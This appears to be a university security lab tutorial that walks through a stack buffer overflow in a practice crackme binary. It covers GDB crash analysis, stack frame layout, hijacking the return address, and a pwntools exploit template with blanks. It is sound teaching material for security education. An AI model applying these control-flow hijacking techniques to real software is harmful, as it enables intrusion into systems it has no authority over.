Tut03: Writing Your First Exploit

In this tutorial, you'll learn, for the first time, how to write a control-flow hijacking attack that exploits a buffer overflow vulnerability!

Step 1: Understanding a crashing state

There are a few ways to check the reason for a segmentation fault:

Note: "/tmp/[secret]/input" below is a placeholder name for your secret input file in /tmp.

Running GDB:

```
$ cd ~/tut03-stackovfl/
$ echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > /tmp/[secret]/input
$ gdb ./crackme0x00
> run </tmp/[secret]/input
Starting program: ./crackme0x00 </tmp/[secret]/input
IOLI Crackme Level 0x00
Password: Invalid Password!

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
```

Checking logging messages (if you're working on your local machine):
```
$ dmesg | tail -1
[19513751.485863] crackme0x00[20200]: segfault at 41414141 ip 000000000804873c sp 00000000ffffd668 error 4 in crackme0x00[8048000+1000]
```
Note: dmesg is disabled on our lab server, but you can use it in your own local environment.

Checking logging messages (if you're working on our server):

When you're working under /tmp/ (and only then), our server stores dmesg-like logging information for you whenever a lab challenge crashes. For example, you can find a logging output file named "core_info" under your /tmp/[secret]/ directory if you crash our tutorial binary, crackme0x00:

```
$ mkdir /tmp/[secret]/
$ cd /tmp/[secret]/
$ echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > input
$ cat input | ~/tut03-stackovfl/./crackme0x00
...
$ ls
core_info  input
$ cat core_info
[New LWP 18]
Core was generated by `/home/lab03/tut03-stackovfl/crackme0x00'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x41414141 in ?? ()
eax            0x0      0
ecx            0x804b160        134525280
edx            0xf7fbe890       -134485872
ebx            0x0      0
esp            0xffffd5e8       0xffffd5e8
ebp            0x41414141       0x41414141
esi            0xf7fbd000       -134492160
edi            0x0      0
eip            0x41414141       0x41414141
eflags         0x10292  [ AF SF IF RF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
```

The instruction pointer was overwritten with 0x41414141 ("AAAA", part of our input string). Let's figure out exactly which part of our input tainted the instruction pointer.

```
$ cd /tmp/[secret]/
$ echo AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ > input
$ cat input | ~/tut03-stackovfl/./crackme0x00
$ dmesg | tail -1
[19514227.904759] crackme0x00[21172]: segfault at 46464646 ip 0000000046464646 sp 00000000ffffd688 error 14 in libc-2.27.so[f7de5000+1d5000]
```

What's the instruction pointer's value now, as a string? (man ascii might help.) Can you now tell what part of the string is overwriting it?
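If you'd rather not read the ASCII table by hand, a faulting address can be reinterpreted as the raw bytes it came from. The following is a minimal sketch that uses the 0x41414141 value from the first crash; the helper name addr_to_ascii is made up for this illustration.

```python
import struct

def addr_to_ascii(value):
    """Return the 4 bytes of a 32-bit value, in memory (little-endian) order, as text."""
    return struct.pack("<I", value).decode("ascii")

# Value taken from the first crash shown earlier in this step.
first_crash = addr_to_ascii(0x41414141)
print(first_crash)  # AAAA
```

Calling the same helper on the value from the second crash, and then searching the input string for the result, gives the position of the bytes that reached the instruction pointer.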

Understanding the stack frame

You can infer the shape of a function's stack frame from the function's disassembly (for example, with Ghidra or objdump):

```
$ objdump -M intel-mnemonic -d crackme0x00
...
080486b3 <start>:
80486b3:       55                      push   ebp
80486b4:       89 e5                   mov    ebp,esp
80486b6:       83 ec 10                sub    esp,0x10
...
```

Let's analyze how the stack frame is constructed:

When start is called (by whatever other function calls it), the call instruction automatically pushes the return address onto the stack. So on entry to the function, the return address ("ra") is always at the top of the stack:
```
     esp
      V
<...> [ra]
```
ebp is the register that points to the base of the current function's stack frame. When the function begins, push ebp saves that register's previous value (the calling function's frame base) on the stack, so that it can be properly restored later when the function returns. Then mov ebp,esp updates ebp to be correct for the current function.
```
   ebp/esp
      V
<...> [bp] [ra]
```

sub esp,0x10 reserves 0x10 bytes for local variables.

```
esp          ebp
 V            V
 [??????????] [bp] [ra]
 |<- 0x10 ->|
```
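The three prologue steps can be replayed with plain arithmetic to see where each slot ends up relative to ebp. This is only a sketch: the starting esp value is hypothetical, and real addresses on your machine will differ.

```python
# Hypothetical value of esp just before the call instruction executes.
esp = 0xffffd600

esp -= 4                 # call: pushes the 4-byte return address
ra_slot = esp
esp -= 4                 # push ebp: saves the caller's ebp
saved_ebp_slot = esp
ebp = esp                # mov ebp,esp
esp -= 0x10              # sub esp,0x10: reserves space for locals
locals_start = esp

slots = [
    ("locals start (esp)", locals_start),
    ("saved ebp (ebp)", saved_ebp_slot),
    ("return address", ra_slot),
]
for name, addr in slots:
    # Print each slot's address and its signed offset from ebp.
    print(f"{name:20s} {addr:#x}  (ebp{addr - ebp:+#x})")
```

Whatever the starting value, the offsets stay the same: the locals begin at ebp-0x10, the saved ebp sits at ebp itself, and the return address is at ebp+4.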

Looking down a bit farther, at the call to scanf:

```
...
80486d3:       8d 45 f0                lea    eax,[ebp-0x10]
80486d6:       50                      push   eax
80486d7:       68 11 88 04 08          push   0x8048811
80486dc:       e8 9f fd ff ff          call   8048480 <scanf@plt>
...
```

The first argument is 0x8048811 (you can check what's at that address -- it's "%s"), and the second is ebp-0x10. scanf will write the string it reads to the address given by its second argument, so we can consider that area on the stack to be the buffer.

There could be other local variables within those 0x10 bytes, but in this case there aren't any. The only way to find out exactly how the local variables are arranged is to study the entire function (perhaps with the help of a decompiler) and see how it uses its stack frame.

So for our long, overflowing input string, the first 0x10 bytes fill the 0x10-byte buffer, the next 4 overwrite the saved ebp, and the next 4 overwrite the return address, which is the value the instruction pointer takes when the function returns. That's why it ended up as FFFF -- those are the bytes at offsets 0x14 through 0x17 of our input.
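The same arithmetic can be checked mechanically. The sketch below assumes the layout derived above (a 0x10-byte buffer, then a 4-byte saved ebp, then the 4-byte return address); the constant names are made up for this illustration.

```python
BUF_SIZE = 0x10       # from sub esp,0x10 and lea eax,[ebp-0x10]
SAVED_EBP_SIZE = 4    # 32-bit saved frame pointer
RET_SIZE = 4          # 32-bit return address

pattern = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ"

# The return address starts right after the buffer and the saved ebp.
ret_offset = BUF_SIZE + SAVED_EBP_SIZE
ret_bytes = pattern[ret_offset:ret_offset + RET_SIZE]

print(hex(ret_offset), ret_bytes)                 # 0x14 b'FFFF'
print(hex(int.from_bytes(ret_bytes, "little")))   # 0x46464646
```

The second line of output matches the faulting address in the log, which confirms the offset.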

What do you expect ebp to end up as? Check core_info and see if you're right!

Step 2: Hijacking the control flow

In this tutorial, we're going to hijack the control flow of crackme0x00 by overwriting the instruction pointer. As a first step, let's make it print out Password OK :) without giving it the correct password!

```
   80486ed:       e8 2e fd ff ff          call   8048420 <strcmp@plt>
   80486f2:       83 c4 08                add    esp,0x8
   80486f5:       85 c0                   test   eax,eax
   80486f7:       75 31                   jne    804872a <start+0x77>
 ->80486f9:       68 3e 88 04 08          push   0x804883e
   80486fe:       e8 6d fd ff ff          call   8048470 <puts@plt>

   ...
   804872c:       68 92 88 04 08          push   0x8048892
   8048731:       e8 3a fd ff ff          call   8048470 <puts@plt>
   8048736:       83 c4 10                add    esp,0x10
```

We're going to jump to 0x80486f9 so that it'll print out Password OK :).

Which characters in the input should be changed to 0x80486f9? Keep in mind that x86 is a little-endian architecture.
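As a reminder of what little-endian means in practice, here is a small sketch that lays out a 32-bit value the way x86 stores it in memory. The value 0xdeadbeef is an arbitrary example, not an address from crackme0x00.

```python
import struct

addr = 0xdeadbeef  # arbitrary example value, not taken from the binary

# "<I" means: little-endian, unsigned 32-bit integer.
packed = struct.pack("<I", addr)
print(packed.hex(" "))  # ef be ad de
```

The least significant byte comes first, so the bytes appear in the file in the reverse of the order you read them in the hex number.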

```
$ hexedit /tmp/[secret]/input
```

"Ctrl+X" will exit and let you save your changes.

```
$ cat input | ~/tut03-stackovfl/./crackme0x00
IOLI Crackme Level 0x00
Password: Invalid Password!
Password OK :)
Segmentation fault
```

Step 3: Using a Python template for exploitation

Today's main task is to modify a Python template for exploitation. Please edit the provided Python script (exploit.py) to hijack the control flow of crackme0x00! Most importantly, to get the flag, you need to hijack the control flow to reach otherwise-unreachable code in the binary.

```
// To get the flag, your input seemingly needs to be both "250381"
// and "no way you can reach!" at the same time!

  8048706:       68 4d 88 04 08          push   0x804884d
  804870b:       8d 45 f0                lea    eax,[ebp-0x10]
  804870e:       50                      push   eax
  804870f:       e8 0c fd ff ff          call   8048420 <strcmp@plt>
  8048714:       83 c4 08                add    esp,0x8
  8048717:       85 c0                   test   eax,eax
  8048719:       75 1c                   jne    8048737 <start+0x84>
->804871b:       68 63 88 04 08          push   0x8048863
  8048720:       e8 d1 fe ff ff          call   80485f6 <print_key>
```

In this template, we will start using pwntools, which provides a set of libraries and tools to help with writing exploits. Although we'll cover the details of pwntools in the next tutorial, you can get a glimpse of it here.

```
#!/usr/bin/env python3

# import variables/functions from pwntools into our global namespace,
# for easy access
from pwn import *

if __name__ == '__main__':

    # p32/64 for "packing" 32- or 64-bit integers
    # so, given an integer, it returns a packed (i.e., encoded) bytestring
    assert p32(0x12345678) == b'\x00\x00\x00\x00'                  # Q1
    assert p64(0x12345678) == b'\x00\x00\x00\x00\x00\x00\x00\x00'  # Q2

    payload = b'Q3. your input here'

    # launch a process (with no arguments)
    p = process(['./crackme0x00'])

    # send an input payload to the process
    p.send(payload + b'\n')  # or, shorter: "p.sendline(payload)"

    # make it interactive, meaning that we can interact with the
    # process's input/output (via a pseudo-terminal)
    p.interactive()
```

Modify Q1-3 in the template to make this exploit work.
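To get a feel for what launching a process and sending it a line amounts to, here is a rough standard-library analogue. It is a sketch, not how pwntools is implemented: run_with_input is a hypothetical helper, cat is only a stand-in target that echoes its input, and there is no interactive session afterwards.

```python
import subprocess

def run_with_input(argv, payload):
    """Start argv, write payload plus a newline to its stdin, and return its stdout."""
    result = subprocess.run(
        argv,
        input=payload + b"\n",   # same effect as sending payload + b'\n'
        stdout=subprocess.PIPE,
        check=False,             # a crashing target is expected when exploiting
    )
    return result.stdout

# cat is a stand-in target; the bytes are an arbitrary example payload.
example_payload = b"AAAA\xef\xbe\xad\xde"
echoed = run_with_input(["cat"], example_payload)
print(echoed)
```

Note that the payload is a bytes object rather than a str, so non-printable bytes such as packed addresses reach the target unchanged.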

[Task] Modify the template (exploit.py) to hijack the control flow and print out the flag.

If you'd like to practice more, can you make the exploit gracefully exit the program after hijacking its control flow multiple times?

Debugging tips and exec-wrapper

Let's discuss how we can use the set exec-wrapper feature in GDB to better match the process's behavior outside the debugger. When exec-wrapper is set, the specified wrapper is used to launch programs for debugging. GDB starts your program with a shell command of the form "exec wrapper program", where wrapper is the command you specified. Any program that eventually calls execve on its arguments can be used as a wrapper.

For example, you can use env (learn about it: man env) to pass an environment variable to the debugged program, without setting the variable in your shell’s environment:

```
(gdb) set exec-wrapper env 'LD_PRELOAD=libtest.so'
(gdb) run
```

For further reading about exec-wrapper, please refer to the GDB documentation on starting your program.
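The wrapper idea itself is easy to try outside GDB. The sketch below runs env in front of a shell command, much like a wrapper sits in front of the debugged program; DEMO_VAR is a made-up variable name, and the paths /usr/bin/env and /bin/sh are assumed to exist on your system.

```python
import os
import subprocess

# env sets DEMO_VAR for the wrapped command only, then executes that command.
wrapped = subprocess.run(
    ["/usr/bin/env", "DEMO_VAR=hello", "/bin/sh", "-c", 'printf %s "$DEMO_VAR"'],
    capture_output=True,
    text=True,
    check=True,
)
print(wrapped.stdout)  # hello

# The variable never entered this (parent) process's environment.
leaked = "DEMO_VAR" in os.environ
print(leaked)
```

The wrapped command sees the variable, while the process that launched it does not, which is the property that makes env convenient as an exec-wrapper.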

Tip 1: clear env variables

To get a predictable stack layout on a system with ASLR disabled, you can use set exec-wrapper env -i to ensure that the program is launched in an empty environment while debugging. For example, you can use it when getting a core dump:

```
$ mkdir /tmp/[secret]/
$ cd /tmp/[secret]/
$ gdb-pwndbg ~/tut03-stackovfl/crackme0x00
pwndbg> set exec-wrapper env -i
pwndbg> r
Starting program: /home/lab03/tut03-stackovfl/crackme0x00
IOLI Crackme Level 0x00
Password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Invalid Password!

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

pwndbg> gcore
Saved corefile core.545
```
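To see what env -i does to the environment a program receives, you can have one env print the environment it was started with, once normally and once behind env -i. This is a small sketch that assumes env lives at /usr/bin/env.

```python
import subprocess

# With no arguments, env prints the environment it inherited.
inherited = subprocess.run(["/usr/bin/env"], capture_output=True, check=True)

# env -i starts the following command with an empty environment.
cleared = subprocess.run(
    ["/usr/bin/env", "-i", "/usr/bin/env"], capture_output=True, check=True
)

print(len(inherited.stdout.splitlines()), "lines of variables inherited")
print(len(cleared.stdout.splitlines()), "lines of variables after env -i")
```

The second count is zero: nothing from the launching shell reaches the program, so nothing from the launching shell can shift its stack.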

Note that "set exec-wrapper env -i" is a default GDB setting on the lab server. If you don't want to use it, please disable it before debugging, e.g.,

```
$ export SHELLCODE="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
$ gdb-pwndbg ~/jmp-to-env/target

pwndbg> unset exec-wrapper
pwndbg> r BBBB
```

Tip 2: make stack addresses consistent

On Linux, environment variables are stored at the top of the stack when a program is launched. Stack addresses inside GDB can therefore differ from those seen when running the program by itself, mainly because:

GDB adds two environment variables of its own, LINES and COLUMNS, so the environments inside and outside of GDB differ,
the special shell variable "_" contains an executable name or an argument of the previous command, so its value can differ between the two runs, and
GDB always uses absolute paths, which may be different from the path in your command.
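A rough way to see why extra variables matter is to add up the bytes that the NAME=value strings occupy. The sketch below uses made-up environments, and it deliberately ignores the pointer array and alignment padding that also sit on the stack, so treat the number as a lower bound on the shift rather than an exact one.

```python
def env_block_size(env):
    """Bytes taken by the NAME=value strings, each followed by a NUL terminator."""
    return sum(len(f"{name}={value}".encode()) + 1 for name, value in env.items())

# Made-up environments for illustration; real values will differ.
outside = {"PATH": "/usr/bin:/bin", "HOME": "/home/lab03"}
inside_gdb = dict(outside, LINES="24", COLUMNS="80")

shift = env_block_size(inside_gdb) - env_block_size(outside)
print(shift)  # 20
```

Even two short variables move everything below them by a couple of dozen bytes, which is enough to make a hard-coded stack address miss.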

Hence, to make stack addresses consistent, we need to:

Use absolute paths when executing inside and outside of GDB, e.g.,
```
$ env -u _ /home/lab03/jmp-to-env/target [input]
```

Remove extra env variables, e.g.,
```
pwndbg> set exec-wrapper env -u LINES -u COLUMNS -u _
```

By setting the exec-wrapper above, we can remove the three extra env variables while debugging so that the environment inside GDB matches the environment outside of it.

Or, alternatively, use env -i as your exec-wrapper to remove all environment variables, and run the binary outside of GDB with env -i as well.
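The effect of the -u options can be checked outside GDB as well. The sketch below starts env with a made-up, GDB-like environment and lists which variable names survive; the values and the /usr/bin/env path are assumptions for illustration.

```python
import subprocess

# A made-up environment resembling what a program launched from GDB might see.
gdb_like_env = {
    "PATH": "/usr/bin:/bin",
    "LINES": "24",
    "COLUMNS": "80",
    "_": "/usr/bin/gdb",
}

# Same wrapper arguments as the exec-wrapper setting, followed by env to print the result.
result = subprocess.run(
    ["/usr/bin/env", "-u", "LINES", "-u", "COLUMNS", "-u", "_", "/usr/bin/env"],
    env=gdb_like_env,
    capture_output=True,
    text=True,
    check=True,
)
remaining = sorted(line.split("=", 1)[0] for line in result.stdout.splitlines())
print(remaining)  # ['PATH']
```

Only the variables that are also present outside the debugger remain, so the two environments line up.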

CS6265: Information Security Lab